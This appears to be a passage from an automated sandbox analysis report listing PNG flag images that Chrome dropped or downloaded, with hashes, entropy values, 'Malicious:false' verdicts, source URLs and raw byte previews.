                                  Preview:.PNG........IHDR.....................PLTEGpL-X8.ss.M*.oo.R+.xx.ww.Q+.xx.S,.ggrF5.//.p?.zz.P).bc....X*.ss.Q+.zz.NN.oo.R,.{{.L&.X2.ss.S-.||.nn.W1.J$.JK..2..4..4..3..5..8..8..9..=..;..A..=..J..A..O..B.oE.zz[.X.uu.oo.aH.jj.ee.op.``=.].[[.fg.jk.VV.KE1.a.]^.QP.KK.cc.JK&.c.JJ.\\.JJ.TU.LL%.b.OP%.a.HI.HI.II$.a..d.?F#.`u.U.FG$.`.GH..dR.Y.XW.BJ#.^!.^'.^.DE.EF .].ZZ.HH.CD..\..].7C.lO.PP.CD.bK".\..Z.AB.:L.AB..^.HI!.Z.?@..X..X.PP.@AstP#.Y..i.>?.5M..W..WT.R.6<.AB.<=..>..U.IJ.<=..U.:;..S..V.9:..S.9:..P.BB..R.=>.78 .R..O.67..N.56./46.I.34..M..M..L.45.56 .O..L.67.=9..J.12..KAxD.01.12..H..G..J|Y<..F.$,../..G.56./0..J..E.,-.-..@8.+,..D....+,.K3..B..F.)*..@.().32.()..%.}E.!&..?.13.&'..?X\6.yCmR1.&'.$%<h8..=..=.$%..=.#$.%%..<..<.$%.)(.u?../.{:.p?.y9.!".k<. !.s6.n5.f8.a6....h0i6#....]4.c/.Z3.......]+.U.....Y).S).P'.L$.H!..j....$tRNS....$,4<CPUYcccfhn~~.................{......IDATx....n.W....gf<?.<I..K..*DE..m.....W..u/...O.EM...c.=i....+I% l......]]]]]]]]]]]]]]]]]]..s..zq.G...9i....{Q...8.ky.:A.zS......
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):6760
                                  Entropy (8bit):7.9498240312788075
                                  Encrypted:false
                                  SSDEEP:96:YaLXFEJsAEFM5OAxEp9GtuAE/899Qu0uhvFv3hNSAI3acT1HSYD9xSWqb3L6lz:Pq0MIAx/tv9nvOn3acdLD9xVqrOz
                                  MD5:ABE847655ADF5AF30CCBAF861BE3037A
                                  SHA1:BCCC93B4A6AA16C9DF27A561F1A1738566BEEDE4
                                  SHA-256:9F14380EEEFE13A35ECEA3AC5EFB0C1D0148B3A4AC28B717A161FD69EB84B818
                                  SHA-512:51C17CDB2D9E79C0A3600DB173F966523C62D9AB13DDEB73C80C0AA73DABF6BCB9CA9D0358B02A47D3550BFB554DE9C66339BB82DCF87E169D128B15CC4F7C31
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.YD..de....dh%..o.q^e..|m..sw.io..'.'-.{..i.tx|[.e...mr}1.t...z.g...txh....esd..qtf...sw.v..ng..wa..ux..Ud...run_..m..2..5..4..4..6../..7..4..)..8..0..7..'..6..7..)..H..6../..!..7.....V..$..,..5.....&..7..(..(..b.....#.5.....#..... ....9....1...I........*.$...>./.....9...._.,...D...'.;......W...<.".......D..&.=.*.....i.......#.y?.#.v3..#.ux....hB.w!.os.h8....il.jn.nK.bf.[B.j&....ej.w!.[a._d.V\....\/.PA._c.PV._..z..V[.IC.y..IP.NS.S'.SX.@F.@H.s..CI.?G.FM.H2.>F.=E.N$.i..>E.:F.Z..;D.IO.;C.=B.9A.:A|l..@F.4G.8@.:@.G..6>.7>.>*.4<..G.4;.19.6<.18.(Hsb..7A.06.*?..6.-4.+4.5".!C.*2.28.,3.-4.*1.(0.$8.&..F..&-.;&.,4.(-..;..5.$,.#+.#).!)..3.*/. (.%-..&..4.*/..%..&..$../.."..!.',..". )..-..&.. .%(.....'..$x %..#...o.#...z..j..t..a..u..S......)tRNS....&+88FNP[bcdgggh.~~....................C......IDATx..y.\U........."Iw.0...H.Lp..I.I0..A...GpE.g.......9..0p..A3..Q....\..$Q6.c..I.twz..k{.oR.^UWu*PI..?.S..yU.U.S.{...]...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4220
                                  Entropy (8bit):7.941445865022613
                                  Encrypted:false
                                  SSDEEP:96:zE1YN8kg9FTvbNJ08LgzKget/YDrDpnlHtrG6m:zZNO5jnBgzKgK/CrPm
                                  MD5:B4A2F45E07D6B2BCD68BC4F0549F5A60
                                  SHA1:63C3C8A89C64FBB5E07EF97176A2C8127D30324E
                                  SHA-256:1F69E9FA9DBA9AC606E21B52D153E8C38B73B9E97E33AF84A0394FFCC48E7BC5
                                  SHA-512:B378B54C12942422D7A8EC95FEDC5CC098AADDD8E54F9F6A1877A3C68701966EE7B3B5B6F24A3FE478C64476F0F89E0959209F2243CC70A73EE968B58B6BCCCB
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1eb.png
                                  Preview:.PNG........IHDR.....................PLTEGpL-X8.ss.M*.oo.R+.xx.ww.Q+.xx.S,.ggrF5.//.p?.zz.P).bc....X*.ss.Q+.zz.NN.oo.R,.{{.L&.X2.ss.S-.||.nn.W1.J$.JK..2..4..4..3..5..8..8..9..=..;..A..=..J..A..O..B.oE.zz[.X.uu.oo.aH.jj.ee.op.``=.].[[.fg.jk.VV.KE1.a.]^.QP.KK.cc.JK&.c.JJ.\\.JJ.TU.LL%.b.OP%.a.HI.HI.II$.a..d.?F#.`u.U.FG$.`.GH..dR.Y.XW.BJ#.^!.^'.^.DE.EF .].ZZ.HH.CD..\..].7C.lO.PP.CD.bK".\..Z.AB.:L.AB..^.HI!.Z.?@..X..X.PP.@AstP#.Y..i.>?.5M..W..WT.R.6<.AB.<=..>..U.IJ.<=..U.:;..S..V.9:..S.9:..P.BB..R.=>.78 .R..O.67..N.56./46.I.34..M..M..L.45.56 .O..L.67.=9..J.12..KAxD.01.12..H..G..J|Y<..F.$,../..G.56./0..J..E.,-.-..@8.+,..D....+,.K3..B..F.)*..@.().32.()..%.}E.!&..?.13.&'..?X\6.yCmR1.&'.$%<h8..=..=.$%..=.#$.%%..<..<.$%.)(.u?../.{:.p?.y9.!".k<. !.s6.n5.f8.a6....h0i6#....]4.c/.Z3.......]+.U.....Y).S).P'.L$.H!..j....$tRNS....$,4<CPUYcccfhn~~.................{......IDATx....n.W....gf<?.<I..K..*DE..m.....W..u/...O.EM...c.=i....+I% l......]]]]]]]]]]]]]]]]]]..s..zq.G...9i....{Q...8.ky.:A.zS......
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3186
                                  Entropy (8bit):7.836207464093341
                                  Encrypted:false
                                  SSDEEP:48:hOKlr4kiyrmsOnAcDepKPwYdCeodf4OJgHkvvmEQ/DghDLoEZ++OyVcKHaDvr:Vrj6vAcDeUddCf1gHyverK/oE4kdaDT
                                  MD5:ECF5649F1F9CA5BA4387419B940B0286
                                  SHA1:E2956C4B97D6A1DE37150423088C07A48DB3E471
                                  SHA-256:EDA78EC0221AC305FEFC93D0BF8BA7CF26396BA83A5E7CA5834369E5137ACFE5
                                  SHA-512:91D19080C0FB75CCA892914AA07C9035256C3F076AED0A48A31C555BF1EB25B4F6F518584C1BB0BAA79CED6A73A391997E7287D1F0ABE854D56016AC8C0CEC3A
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.^?.lxjbI./.l.neV.&.jS<.+.iabp..m.n.K.%.ap]k...3.l..3.jx..B.m.i. .es..4..<.1U.hv.lb....5cq..o.<Jj..7.drR`|.les.b...n..l..6.mcp..iv.n.k.#..6.lf. bq./@a.n...5.lLZw.apc...sz.. ..&.....&..$..&.....%..#.....&..$..!..$.."..-..7..$..!.....$.. ..6..$.....#.....'.....;.....D.....$..F.....M..S..". .i.Z.J.".a..................i..kw....et.cq....Yj._n.z..Yhgt..Rd.La.u..CF.Qa.p.^m..AZ.K].l.Yg..@V.6P.?SRb..+J.5N.+I.)HK_..'FM]{.+G.'E.2I.%D.$C..O."AEX|.(B. >.!??V...=.!=..;./?..<@Ru..;. <..9."<..9..9..7. ;..66Mx..6..8..4..4. 7..4..2..2..0..0..3../0Gk../.....4.$/..-..3..2..+..,*Cu..+.....*(?mt$&..-+=_..&.:oy.*.8s.7q.6h..$.6p.5o.4o 2Vm.%.2m.1j.1l.0d.0ju.../i..g..i.-z.,gg...+e.)>.*d.)[.)c.'aa...&Q.&_.%^.#W.#]."\."Q."Z.!H.!Y. X..V..F..=..R..L..:..E..<..5..2........tRNS........&169:IJSbcddfgmlvv~..........................................................................................................Y.....IDATx...=..E...~fvfwl...H8.C.7p.H.....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):8474
                                  Entropy (8bit):7.902113371294445
                                  Encrypted:false
                                  SSDEEP:192:OOvdNfkPzxA2yMpomSIVwktIij1ZgCYc8K+pxYXV58tG:OqWzxA2XOmhVD+iPgxUXEM
                                  MD5:DB8967EAB97B3670099D9CB7107AEE50
                                  SHA1:3A1A41F54D54CEE4612171120A0BA6638EFD82DA
                                  SHA-256:F62EEA2258759E5361A0C0634DB98CAA66BBBCCE2566E84D981CCD38EBE710F8
                                  SHA-512:EC0B7E6E21D41512C9776F54F10D2EC8812F9092986906105716C66A9496CE319AFB6BB605BA7EFDD9151CB48FDB11A61E6C9A82158921025101EFD0DF48500A
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL%j.#k.%v.'..%..$............~..}..|..{..x..s..j..pn.egl.~b.{W.mB.chtW=|.6..C..S..f..\..O..>..1..1..5..;..?..N..]......|}.K..>..2..g..s..|...........,....6..A..>..E..H..J..M..N..N..O..?yg/.{6.r4..;..<..>..=.;.>.B.E..JuoEC..djN|zJSsh5..DnrDw.Def=..7..9..8..5..4..2..0.....,..*..(..#.. ..'S\<ZY7r.:OKQeTY\:eU'q^$@6.&,,.......D[.Nf.Vm.]x.d..p.&|.'KP..(..)..,....8.j..z.@F;...8;7]^_...MQL......jkl}..suv..............]..]..p..s.........................!Cx.#..1gy^}.o.....z............q...E\f..h..p..q..x..q..m................ty.flx-.w..a.._..]..+BQ.J_%HY.H]Yv~.Ri.Ri.Nd.Se%OO.Z+ =B/`q.s"UK"LA".j6.y:..?..G".M..O8yN.&..k..I..8(....\..%%.?E.MS.Z^.cg.`d.km................................................t..`.................Q..9..C..M..Y..b..j..q..s..ey.........tRNS.b...........................................................................................................................................~..}.........................^-EP....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3139
                                  Entropy (8bit):7.854025566514434
                                  Encrypted:false
                                  SSDEEP:48:hEu7G3PL/hchUhhXz5ZgAaMvjt4W/nVgoUOSM8uUlVX1ezYp1N56xyN:9GD/+hghXoPU4+UOZJUx08pO+
                                  MD5:95EA82BC7753BBB3CEC2A90558797E60
                                  SHA1:061564F6E98C209744078F4AEFF4919CB4032B0C
                                  SHA-256:C57906595C97FF0773DF3A3B6BF5689E8D1D05C26481FDD62D0633F15BE71DEE
                                  SHA-512:646643F0C096106FF4D0ECA53AA9B45F1703DCFD70CC2A66D7C4DE34C66B3A6465BB1452B2C898CC6BB0F56DFA2AA1CA5BE6B20596E98E4F3D086FC06DD6292C
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.aA..Y5....k\f...lGO...fnokO..e...z*...y...ah[[[..(......kq.x*.RZ```z......gn.....,,,.ho.....w...z+ccc....dkRRRx....eee....z+.......ddd.......gn.z*ccc.....w...nu.{+///.....`ab....ah...x...z*..R..N..T..M..S..T..Q..P..S..S..R..S..Q..S..P..R..O..R..R..N..W..P..R..P..M..[..N..L..O.._..L..K..M..N..K..c..P..g..L..i..G..m..G..G..p..W..r..G....y..D..w.B.?..<..9..5.ns..2.XS.\a.dk../.^f.F@..-.E?.OZ.Za.T\.{+.DP.KU.7E.DM.+;.>I./?.7B.DL.*9hhe.'7.(8.94.%5.%4.4?.#2.&4..:./<.*8."1```..9.8B.... ...,[[[..-. -.35..,..+.$1. ...*..-..8..*..(..-..)..'VVV. .. ...&..&..$..'..$.."..#QQP..!..".(-..+.. ..'..!..................JJJ.....'........).."...CCC..#......==<..!......665......|..//00/ 0. 0../-.v..())*(.............................................................$.......tRNS.......&077:BILPUZcddimosyx}~.........................................................................................................................Xz.1...\IDATx...=..D....U.]n.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4560
                                  Entropy (8bit):7.873929632272138
                                  Encrypted:false
                                  SSDEEP:96:S7AFqtVv2LS9zlnCgLJGj31c5HwvazMvKX7NB0yjsBDSruI70lV+u:y5XwUlCg1g31clWsMvgNSyezg0lsu
                                  MD5:55053FB98BFD44A2AC156472D3E53A44
                                  SHA1:B48F542647F6DCD37160FC8DA02735E9DC8C585F
                                  SHA-256:89CF4B13F0FCB92029E73BD4304CC313C2BBFF866E323B6E33F8FD6B9B57E3EB
                                  SHA-512:8451EC170BBB57A8630A085598C0FA98D1EC1BB21333861A0189268948D15DCFE25E683B57193E8EEF9D3E20B4046A3C2EEDE2695C702EB32D39B5841E1E7492
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f1-1f1fe.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.d_.O(.ah#M).\c.Q*.gn.P).fm.Q*.X`(m=.W0..!....fm. +.M&.Q+.X'.......bi..'.Q).ip.<C.R+.ah.Q*.jq.O).N'.bi!X1.P*./7.kr.]d.I"(U6.O+.................................D.h@.c@.b.ip...@.`@.`.dk@._?.^6.Z>.]=.\.^f<.Z;.Z.^e.W`9.Xyyy9.X0.S.PY6.V;.X.Ya5.T-.O.IS.S\7.T.MW2.Q7.S.BM0.O(.J.RZppp-.L5.P.;G.CN%.G.LT+.K4.O.FO*.I.3@+.H!.C'.F.9E.$5..I.EM&.E.@J0.I.-;.2?$.C.$4.9Cccc#.A.&4.(60~G+.D.$3!.?.%37xJ.4?.'5..=."1]]].*7.!0..;*{B..:.7?..-..9+vA.~:..%.,7..(..+..-.&1.y7..))p>#s;'n<..&.t6..*QQQ.."..$#j9..).p3..!&f:.&0.."..#...%b7....h/.....!.d0...!]3...EEE..".`.!Z2.#+................[(.U-.......V'.......Q'j#)...&B.687.L#....G ...H$'*2,h.....r..()(.8.-&&...&&&H..$$$6..""".&# %. ...O.."...% ............!........9....................................................................(.!<...ctRNS.....%-7=GNWcbccgfix~~~..............................................................................u.....IDATx...k.%.]..o=...{..ag/f...\.\.....DQ.^......1....!.A#,d.,f.!.$b
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3998
                                  Entropy (8bit):7.921669068226218
                                  Encrypted:false
                                  SSDEEP:96:TbIvgOyLbY9vIMv073V8+ZAJuZS5NyNCQe68S5yWk/:woOyYRI407fZkXi0SI/
                                  MD5:B853DD0A4ED71757A3CE9CE4CF622EDB
                                  SHA1:F1B0861D2F43B25B55F72E5EEFEB0216E8C8D2E4
                                  SHA-256:4DA4847E5690833A90662E14D9D7292AD2C0AEA4DE70CAFF64F91192FAB0BF2E
                                  SHA-512:08115695931287D16E930A8963D0660A57C76FF3DF94CB9F949F48307FE0636E80FD28626A5B99B531546C675CD3CB68E3D5BD2B68F9651C86FF60F8EC5C18C0
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.gts..xu..rss %sx..lnu.!.xzx}.t.!.tv.JLgl.q..|.../2.y{~#&o...prx!$.....K4:bsx.v ".qs.}.|..uz.u. MRwty..vxu.".egrv.s..z~..}.sx.x"$.uvn..|%'x}..}.\a.n..HNt.ln.......................z|....su.kn.ei.pr.]`.]`y~..TX.ce.IH.IJ.KPv{..KP.dg.KO.MR.JO.JO.JN.IM.HM.IM.RV.LU.Z].IM.GKqv..A>.FK.KT.EI.EJ.DH.Y\.FJ.CG.QTmr..CG.AEhp..DH.AE.@D.NU.>C.?C.GL.85.=Agl..AE.;?.<@ai..:>.?C.9=bh..9=.CH.7<.Jj.JL.1..=A.6:.6;[c..49.7;.6:.48.37.;?.59[a..26.6:.36.15{N~.*&./3.04T\..59..2.8<..2.-1.Gr..2.)(.,0H\..-1SZ..8<.*/..2.+/.)-.*.MV..=`./4.36UQ..(,.(,.'+.)-IS.JS..&).#..'*HR..37KS..%).$).%)>S.FP..(,.%)<Q.DN.]E|.)-2S.CM../2./2w9b.#&DL..*..2RAK.@J.=H..!$.,/<F.."%,J..%(9C.<Dw.),7A...!4?..&)4>|3=...!.&)^-Z1;~!@./9|59i...|!$-7z...+5x.9....v..)3u'1s.0b%/p.1{s..$.nM.>",k.+vl.. *f.'`.&U."o.$W..M.......5tRNS......%0399HSU_`bcgjpvy~~............................m.{.....IDATx.....U.....G..{.^ZKE......+7.. ...Hw..;.Z.w....7>.......z.5&..L...s..H.po)}l..2'....;..]]]]]]]]]]]]]]]]]].
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5164
                                  Entropy (8bit):7.8578666520584255
                                  Encrypted:false
                                  SSDEEP:96:KH2aEAzEPCt+LuMb+PYVKLtlvdnAQZ/EZlPQgrCfbhWO9Gi6:BAziyJwVStJdrZOxQgrClWO9GP
                                  MD5:170865D40A08ACB78C3673BC336B53CB
                                  SHA1:A4C01EDCD42C83D8F016BC1E6042D1E6DBE62256
                                  SHA-256:766B80062EB646A8A11E53BD7F5705629E47167B75889974EFDF643763132A45
                                  SHA-512:73098288F3DFDBD5E89ABAC1B3CBA556B445667DFAE486797856C0904D79FC1CB27BA79304712AA4AF001FEC636F117DB8902FB2082CAB89552779C6914CB9F1
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL...................................................................................................................................................................................................l..R............................ub.......d......bMK..:.x.O7{..%|j..V..........p...lX.....................................................................................................................................uuuzzz...........................~~~yyy~~~.4......z.O.........(.&.%.#.". .....~....w..j............>............`.......6........YC.............................qqq...................................................|||yyyvvvsssrrrrrrttttttxxxyyyxxxwwwyyy|||................................................................tRNS.~......................................................................................................................z~~....;afn%.4Uf.......9[.i....."........................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5805
                                  Entropy (8bit):7.936881503458973
                                  Encrypted:false
                                  SSDEEP:96:mEf97v7Hq7FyLeoV9yY4gFi9YB4s7Y/IY9mJlZfDyCmOdOaeFgPdbzipgh:mEf97m4LJV4Y4EtRkmJl9DJm0OaEgVbX
                                  MD5:AE8A588354EEB277073181535DEA31A3
                                  SHA1:0DA755BC20300AF79823CA6026B0A196669D90D3
                                  SHA-256:DF80A0EDB90909597A88E0D652A1D5C7C744DEFAD466E6E0663D42BE6E7D765E
                                  SHA-512:0A6AC23DF686E386D374642972E4E874C05A26786FA2D9436AE35FBB3CF56F5CFE264FE9F295E4266D28FF8E06ED6CDFD8D2270C334EB5D7D545E0CF770C4688
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1f5.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.......,f..Oft.es....BKegu.......iw.......iw....jx..........cp.`n...'ix..........^l.......\j.\j....[j...........1e...;L|:Jx5Er.............................-...........................%D.. r..............,..p$B.!!"."u..,......!?..$w...##$..-#A......+....%z&&&....'{./.&E..8..6...+..*..#$$%.*e..^..$..O.,..g...+$B..;..X..3......o.Q...*.n..B...-..+....9...,.,...-..*$$.ic%..h.]. >..`..%....)(#..}.|..Q..u.."...).G..1.&F..+....-+!.J.KG#......_Y%VP#....(sk'..(..-C@$..:.{&.!//$..-bgUyt%..(..G..G..'.(..*.....J#2]42$..@.&X../w.$"+E..hszu~.L#'5?;"|.$.HMVY.. P[i...97!IUi-m#..*..W...Zcc..$Ju"..1{{AxyPM.!U[W-`"...>M_8L.1F.hw./J.Vh...._o.6M.ds.'B.HY.Ve...B\k.Pc.'?. 9....P`.AT.:S..0z.*}J_...\.5|@W.bl{.9...)E[...T2N..,..b.;.>Nt.)w|.n.0.)F..4...3kpT..M..,{...=...9..&':o.f....+tRNS.~bb~`...;,.......>Pf....v..t....*...}.U...y.....1IDATx^...j.1...@....................4...3L..?....=.A..A..A..A..A....!....4.!B..q .v.u.8..:....^...bbB.X.s.h..E...L..|.P05
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 50 x 50, 8-bit/color RGB, non-interlaced
                                  Category:dropped
                                  Size (bytes):1920
                                  Entropy (8bit):7.864950750930725
                                  Encrypted:false
                                  SSDEEP:48:5Y07azs4MdXdL8BCKx4PXnE2LJxPsLk3F9dcCd:5YRz2dXBDJnZEW9N
                                  MD5:FF2989744D4813C906047582226ABD28
                                  SHA1:41B973276F7A99AF05115B89B401ACEB02F573C8
                                  SHA-256:3151F7930D821BCCF4A76CBBE4A3533E2B56BDFF696F260C864AB639AC7526EA
                                  SHA-512:ADD07F186C255E361094878A71EB4257C4E60A6E4908BE168FBFAC30F768B18E0E292F59E80D75D78EB79FB62C820C03C512F07BDA6D8D1C323506E5D173BDA2
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR...2...2......].....GIDATx....O.....y....}.1,...r#..H96.C.j.......s.N^L.3?....*}5..I..3..y.a..........x......7}.;y....e....7.v...7I....Y.gq'..i'J.....vp..~.G.m.}...._../6W?.\....'..}.....`.~?.c9.2...t.fg...Xg.g4M.0ua..0.#.~.j..i...w.ep....D..Y.Q..Gu.. D..Tg.O..Y"#.......\.M.cm*..&.>....4c......Q.I.L.+L...Tm....@b..U...L..IL..TqT..wG.....F...}....C.{g..!I.J...SV.!.....^.... .h"...2.ow)+.2.......U......8..j..ezB.]..pwxR..pr;..K/_..D.@..Lda....dH...4..L.GUm....L..c....x$..@o.0..._<..sT..../*=..7....1..6.Y8.2.="..T....:r..U.I..M....B. ^..2..0..A;w.[k...4..j.|48..8...;.4m.`....9*.".dZ...BK~f..#..........*@s.7M.)7...YzZd!.....F`.i.".1...@G..~.J...X....k/.,...4.-.'.'.@.=):.+.].i"&.Lb....F.Vk.Xx.d...E.q.1...;...&..g...4......S.0*.0*.8*dwC....,.%2.p<(......w....6....D./....n..D..yV....nv$~Rv....nL...l....53.2.4.8S..Q..e=.2.#...sg.^.....`..q...N<n..^.(.........Q...=.+...\...?. .......;..@Og._....Yi(,.T>[.,,f.d.Hd.......t3[..B..b.H.u
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4965
                                  Entropy (8bit):7.91574681553498
                                  Encrypted:false
                                  SSDEEP:96:M7fvJ/KpjFVIwA9uhtplpmC6vo1oarmMDg6BpYZqPYEe975j19K:Mrhuxqw+uhtBvx1NRpYZPL5jy
                                  MD5:D443BF3C431C50BC9C67F00416174CBB
                                  SHA1:A67D1E26D2EA519BE3DE404A45FBF2697F0134F5
                                  SHA-256:783D69C11B7E159EBFDF023B94FBA25C2236ED14AAD33C86F909F24D29E798C2
                                  SHA-512:3823385C27E4E774B73A6F873C75CD32115FD51571203E45212E311424586CA028FC0959BD2244147620EC34F51E89A0AD3A7C167E1FDB2F3656348B77A0FA41
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLp.y.W.h.r.Z e.p.X.n.x.X.c.m.X....!x/p.z.T.f.p.W!..-x....;m.v.V.l.v.Y g.q.Y .Y!.Q.m.w.P..^$q.z.Z!b.lq.z.Q..]$E.P..&..%..$..#.. ..!.."..&..%.....$........#..".....!.. .............................*.......................)......................................4... . .....$x.9...e.?o.y.&j.t...d.o].j...W.fo.+M.EM.^e.oR.aY.fD.W...b.l.n,K.[<.PZ.e5.Jv..F.:<.O4.I3.I4.I4.IN.\2.G?.QY.d...1.F).L1.F2.G/.D=.N-.C..C.^/C.RM.Z2.FU.!..O+.A*.?..A(.=@.O.{...H,.@5.F&.;$.9-.?<.!".77.H..B .5-.?#.6..3..9..2$.7.n...+.B7..3..0'.9!.48.>.....-".5..'..0wg&..+&.6..+..5..)Pr0./6../..'..-".2..$va...%#.2..$..%..+ |...&iW"S`+.!?.w..~$..=..:.y"rC/..8.-2.r%.m)..6ZM...3.f'..1..B.l.../..3.a&.....-.c...6..+.].K@...).X...&..'.S.86#..#.N.|..9/.x..m..%&&&!...%.....%........#....T.....&tRNS.....(/9DTVccegv|~~.....................G:....IDATx...k.eg]....g........h5..m.)..../.i.......5...." .U0....H.....hH..`C.I..eh.v.Ng.3g..{]...<k..9k...9-H..L....O....k...3.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4344
                                  Entropy (8bit):7.928749804099309
                                  Encrypted:false
                                  SSDEEP:96:O6wiyu1oerUT9axxeRIYB9bJiZjV/vKF/UTc/W:O1u1/IdaYvkjVvw+
                                  MD5:0ED1C716172F44B68334B98353E32E72
                                  SHA1:BCF6A0CD198B82E730352E199B832745D0F6A6B0
                                  SHA-256:4D8FC1CCFC3F458AE9C23C41BA14CE882C22BB0A2C126043975AEB93B6776A01
                                  SHA-512:942F72BC5B766DD2B960B8AE4ADA00DFC8391AE0A6EA2784ED7100CBECA479CDB8454474511C8CA28879937FA12DBE9D269711040C60C6E31CCE8385ADD45FAA
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLiK[w..U(7.koL#3.hmT!.l...mpm..n..H&7.gke...&.l..g...ot.<\.]bg...nr."&y...26.=^.nrl..e...HLn...=^.mqg...mrl..g...<^.nrf...ko.<].rvl...X\.hle...z..BF............................................................................{(...{.j...pug...r..g+a...in.d .h.Y...af.eiQ...d..[a.`d._..Y).j.I...PU.S[.\`B...TY.X..Q!.HP.SX9|..JQ.H&2x..38.=F.KQ.AQ.?G.7A.27.EK.@O+u..6?.?G&u.&u..<,./5.4=%t.%t.%t.%s.$s..3<.9G#s..?!%r..5>$r..8@..4#r.#r..1;&p."q..t..0:.1:!p.&n..:B./8"o. o../8.n..-6.5'#l..2:.m..-6.k..+4.o..j.'f..3:.+3.)3.l..(1.*4.(1.+1.)1.+3.7>.%/.&/.c..!5.+3.&-.#,.#,. *.$,.]..!*..3..=..(..(.)/.%-..&..'..5..'..%..%.V...#..-..$..5.."..#..&..#..!.&-..!.&,..!. (.P}..,..#.. ."(..9.Kv..,.#)........".Gp.El../|."....Bg.......>an.!u....!~...:\y..k..t..l..e..b.....)...2tRNS.....!%257:EEUTcdeggnvx~~..........................m.....uIDATx...[.\.}....v....k....bLSh....Fjh..U*H.T.Jy U..j%..b..9MRQJK.6..Q.........QQE...A......;.s...{.f.3;..1...|^l..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4699
                                  Entropy (8bit):7.930233092678589
                                  Encrypted:false
                                  SSDEEP:96:5iu4QgqCxhXhSJcAf/W8K2BDoJvxI4VVMHg37:wugqCxphSrDK0oPI4VVKg37
                                  MD5:DEC5CAB4B9E1C8DFECFA129D87594D8D
                                  SHA1:359D543B9DDAE4FF5B46AA4CF6CC062D30058EFC
                                  SHA-256:EABA36AE62DF681F3F7B92CF61EA08F60085A0F3299A9410B54247DBC47C867C
                                  SHA-512:E3261485F8E172E049C036C22EDD466FAB94C3BA3F2565907ED9DB0024998839B82C6D992048182AB4BBC0858B5270FFBEB08E34ACB6035C95371DE2B16AAB6C
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL>W'.dU....dd.O..P.|...\\.vv.ff.P..dd.P..@@.k.....ij.R.....Q..cc......}66r......bb.M..pp.S..ee.O....f33.Q..jj.L..aa.V..M.....kk.^^.M.w..wuu......................................................|~....~~....tt.jj.ss.zz.hh.dd.aa.]].``.ZZ.kk..%.TT.[[..$..$%.&.NN%.%.TT$.$$.$$.$.NN#.#.SS.GG!.!.ZZ1.,.......NN#.".GG....@@L.#.^^Y{$...:.! . .AA....II.QQ.99.......DD...mk".<<..........11.N$.<<....31...{Z..74.?9.......**.......&&.&&.&&.%%.!%....%%.00....++.$$.44.B=.%%.##.##..%....-,....""Dl..~..%&..$.!!. ....!!.......('.3/......0o........}..('.w................C^..........u::....z..~........m..q..##....v...........g................ZC..............m..b..........y(.....e........]..............Z...........a..W....................V........P.w.........J.....E.u.._..o....../tRNS.......017=DSSbcceehx{~~~~.............................IDATx...M..e....|&3....v.V.....=.J..XD.7..<.U.OB.J+x.D..."J.RY..A."....[.`D.fw....;..Mv25.lR.../......y................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):6760
                                  Entropy (8bit):7.9498240312788075
                                  Encrypted:false
